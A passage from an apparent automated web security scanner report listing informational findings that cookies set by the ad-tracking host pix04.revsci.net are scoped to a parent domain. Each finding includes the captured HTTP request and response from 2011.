11.32. http://pix04.revsci.net/F09828/a4/0/0/0.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /F09828/a4/0/0/0.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /F09828/a4/0/0/0.js HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="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"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC+mHkn1XTh7V8/ZBre5UO8GZbswedStCMJ7UnFnJfymFXcGIeHBb+r5/YGNhB+d; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:47:56 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:47:56 GMT
Content-Length: 543

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'f09828');}
function asi_addElem(e){if(document.body==null){docum
...[SNIP]...

11.33. http://pix04.revsci.net/I07714/b3/0/3/1008211/304415100.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /I07714/b3/0/3/1008211/304415100.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /I07714/b3/0/3/1008211/304415100.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F04%252Fus-weather-football-idUSTRE78222D20110904%253F_rsiL%253D0%26DM_CAT%3Dus.reuters%2520%253E%2520news%2520%253E%2520us%2520%253E%2520article%26DM_REF%3Dhttp%253A%252F%252Fwww.reuters.com%252Farticle%252F2011%252F09%252F03%252Fus-weather-football-idUSTRE78222D20110903%26DM_EOM%3D1&C=I07714 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/04/us-weather-football-idUSTRE78222D20110904
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_o6zg=MLsvsLFOMQ5vJpHEvNGJwe3bNDdPqDE7tney9j8XHZxVnCKr9EgfSAe8w4hAY+1S3GROT8pMx0Dk4VfWE4HqpYJRGPSKk1HuHKzz4/0koCkSq5JBQoSmi7zZNoJT0NEAALAtP6fzvZAWXZ+loThQ0WihkO+/o6mSdVwKrgqt65uVFEp8XI4N3ZpjmWzsphrfMQP8kY5P/8jQTq0b7REA668mU80lpsjMzKwzFbryqD4V41L+z9JHKh4rhVL47OYEWipj787OGH+L5uaHYXYNbKq2OBL8iIXHGM+Swv9IOQ5FriyvLu/Z2CaUGb3SZd2dky0d4PEM7QQNkWvbJUUcJPbvZf20Hhlhq8CwdVhIbBVx3SiCZYBPlHik9o2CQ9gk9RT6MakYoJ+gbc9aoDyd41769iZf5VrCQMs1k0du/3q50I3PWYMPgxVJ3cffzI135Z/BwA==; rsiPus_NETa="MLtXrkMudi5rIAH3UpwEJpB/RQj/qbmQuWN+RCv7T+OLIs2UoOzw2R6OZozbaj0NZZ45MlkNtMqPVOptzqkKdvD18Zfp9zyM+idE6DRdxshTuowPXaRbsxgmifn/wvKgJ9/VnhrJzKeMgZVTq8IsQARrHBkYIrXxPiLXc3N22revbL0v4m855Eayu7V5ibT1fXUEnuBnm64+IogRugWmliBFss+7oKy0C4/dn2rLIYYUbVP6peeBE3GASWSkD0HguCRTCOCL7EINF3DBxBW7lINJFnudhYTenjgNbTyOJHnaBHD5RLX0Oho8ilqNaKYacw/RPC0="; rsi_us_1000000="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"; rsi_segs_1000000=pUPFecPC7nMQFmLKHV0ITey31RIQwTkWYA7XBUxrAAZisncWnsac5BtpDFUZr6/jfEWlBmKgLSikWJN5CeVI20Xbp+vrNYD6PVldZSUAgu3S7s1bxWP/7kn26cuKgi1K+/Ydf4oafy+ypzYpgeCjqXgiKj8gNT0QkV6VtDzz1yGkT0ImNiyCYCLyTW6llvuj6rbhnFE+nvecITNA4NoSYcIBDuAmpXDMUXN6FvJVluGCUB+a; udm_0=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

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_o6zg=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yGBx=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_pDT9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UWJs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_spZQ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_yNA1=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ymBV=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UZSm=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jxkC=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_U-2H=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MHAh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_mC_w=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_hJ1L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_a0q5=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_CGuf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vcWj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UeD7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NZMh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_gtXn=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Gz72=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_I_s8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4Yae=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_13QU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yd99=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kx93=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Vjxv=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_i6y7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__ci3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BIfh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Hlh0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fVrw=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_UYkU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vq52=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_p_N7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_swop=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_DAhz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_36jJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_EGaf=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Yqe4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Xkff=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PotF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_6iIy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_rG0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Bmc9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_AIz7=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_owhI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_YG_I=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ttgh=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qIL0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_zoqu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Wj7v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8_Kd=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HV6c=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_lX7E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cMvP=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_PMyZ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qp5L=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_LM_E=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_qsf6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vgZJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vs0v=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5KhS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__-hU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_e4dU=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_tBSl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1hrT=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cAs9=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ufy6=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Zbl-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_kzjM=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_4dwc=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_7nfY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_TXTA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ifOy=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uXx-=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_SZmK=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_VzFl=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MYGJ=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ePg8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2b4r=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_BSfF=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_xPU8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_MM9p=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_KwBW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_NX3a=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_QdlW=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_HkOY=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_ZiGI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_8S1T=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_jqXq=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_bM22=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_cSyo=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc__g8N=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vWFu=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_sm2o=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_aHEk=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_trlL=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_S6yp=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_46IH=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_fPgs=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_vtS4=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_Q7Ad=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_uQON=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_1YTe=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_WRRI=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_iCxA=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_wveS=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_IoVb=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_RU0R=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_XSck=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOMnC7gMMU594t/Sn7ey31RI0YjFJAbeHbXhIfrk4Ow++ZH8gIQtYr8iWg2RZvh/nqSuFNyBKWw8Xyc7c/RIna/1WF9Q8p6WStaYJPam7yG21EA//kgEQ6MuyzqUKz7IUGE71nqp5Au9VMkKc/okTNLTXO89O6DKukkzJFi3MA0P6larBAMm1+anARqSwCEH+pmFjv+pITclEQ9S5f07ns5ipgm0hyliLId0YqoxKyXj/KVYnPmJ3S57oyns/3A==; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
Set-Cookie: rtc_wRZH=MLsvsKMucD5nJRGm+X48W1s+JnWw2pAhBM0cosZtfJ9ViXcJRkBPy031UQhZHBj2vSo7My1zYrWwcschx0t7TSkF8tieuR/3XAVwFM0lt/amf/M8PVJdtTynoppWQLwUyw+nQ4vnPoZ4ecjmuzsYWm/I2N73KKVfeX8CHvaFRB/odeHTVhMokPrgK0qQ+4F3yU2W660bYz6wEhP5v4RYC/mf52PIfQqOyndNLJkQCFD+6kkfncm9CKn0SA3XJsqyB7uYxqUSa1VKB2R0mTF1Ysy+cH5CU7aekURYILu4a+PbQ0i+M6NDTvAB/ZnFaR0vRSvwLSTwhp/efqpVeBpt7fymb4N5xV/bBbuIdvrIVZNthFUL8XeqVq3HZxhXhVSm+7A7svJUS5WwVMRvjIc4MEZPO4teely4a6ukWwMIWcaNZJCu8pdF3Xk+rpnQ6GfVFyq9jR0AvAhLLm6Ma1/MjwM=; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:56:55 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:56:55 GMT
Content-Length: 730

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['I07714_10272','I07714_10273'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
var rsiDom=location.hostname;
rsiDom=rsiDom.rep
...[SNIP]...

11.34. http://pix04.revsci.net/J06575/a4/0/0/pcx.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/a4/0/0/pcx.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain: The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /J06575/a4/0/0/pcx.js?csid=J06575 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/topics
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=c84fd631153807952fe54cd0e5ae7570; NETSEGS_J06575=52e7dd6cb6c0ef21&J06575&0&4e87b369&0&&4e61a9e1&68d836b0a1fd7963e56f000759258b9c; udm_0=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; rsiPus_SQhO="MLtXrlMusS9rIAH3clmoJlAWvvGY5puCxew1nF+7KKCLIp00Q0d5+4d5FTJN4jWaW7ZHam54EN93XHnHy0rOylMjoJfpR8Ot/hdAS0oi5KMsVxP6pk60ZMcWicI3+tY5pZTOv5Ye+bO5vJziwOr5sQvsZMEna9myPmHrGexS7N4O52XbrX2OHdV2WE8wa4+Y6mYSng5ukBKpAbT3kl1kOcpkc14LJ+MrtSc5HR18lURkSrIbJb0inGWz9icdk6QiSpIZvCNR5/W8QjD5a5oobWvv91oYNaHqohX0SU9QceoEDdPUBYo751C4r5qQrxiWZUYDP4g="; rsi_us_1000000="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"; NETSEGS_I07714=52e7dd6cb6c0ef21&I07714&0&4e87b3cb&0&&4e619905&68d836b0a1fd7963e56f000759258b9c; rtc_yGBx=MLsvs6FOdg5rJ5G0/9EJWIyw4PHibwH6uVt7/VpenloVcWdNFNZiSxO9y4JBc+DG3WhOTyLGSEm2XKqNsvpwfOWCmJ0c2t+cIL3sSVMoC60oAOQaA0uiQ/KhZUFyt+0zvYGqZnAB4RGmYplfcqtWpNYxHIk/nm2P8mGTBWeBBW+AqOAe1AesQNGNEa3jqWS0zKa8B117g7SP7u4NPTo1wxo+1LK2dj7fi6jyXNyPESyOPB3nXjVgQIWb2uAkhVMzrYIdfgwH0q8JWBvK6DFZGbPCWaFDtzAAHz/pdTyXcdJPSOx98xhP5uBNpeTknXqk2YJ7S7pvoTHbaVmFTviH/UUIjkuAaSrGfELHbX5vv/1BgXGzt7oOVcskB0rxUqhyme0JOcbqr7Sc2eK6lTVu45c5pLhzH2ORR7k7/FLIOA/ayyVBE90wqpSwHe+A4/kXIU6NgxU=; rsi_segs_1000000=pUPFeMPC7nMQFmLKHV0ITey31QIddBjzAHYhBTtuzLxVqYeIB48s6jNq5rQRfJuujANMg2z1OSzDgmK46EHiCpnnSkbJdt0aEgyn07eBOqooss/IiVH+3uWO8suqG+1eoEh/82Cs3O88kec4YiFqAa3rjVYjKvyPYa/IUIgptmEwacIExC/GONy6nw+ajTz9q356DgSSvhE4wrAr/08mqmTgF2jpTG/LERv68+yK6uHsbh5u

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFecPC7nMQFmLKHV2YkRHDFb4MHts9wYbNBNVkVMlSqYeIB48s6jNq5rQRfJuujAOkBmKgLSisXJt9DfidaDjiohm3r3xyDiRc0RSYssEkx82iRCT/vqwD6stqoW/kb/UXziqs3OeNfF8Ao1v9+u7SMzxg3Di8QrmRiZeiI7/W1J7gLPe3aStI9uT91NmYsK/+20IUfTD2rpLQyT66Y1DyWp2L4xjiTUCECLmgubnP; Domain=.revsci.net; Expires=Mon, 03-Sep-2012 00:49:51 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:49:50 GMT
Content-Length: 820

/* AG-develop 12.7.1-99 (2011-08-08 18:20:02 UTC) */
rsinetsegs=['J06575_10396','J06575_50240','J06575_50735','J06575_50778','J06575_50892'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

11.35. http://pix04.revsci.net/J06575/b3/0/3/1008211/66697159.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /J06575/b3/0/3/1008211/66697159.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

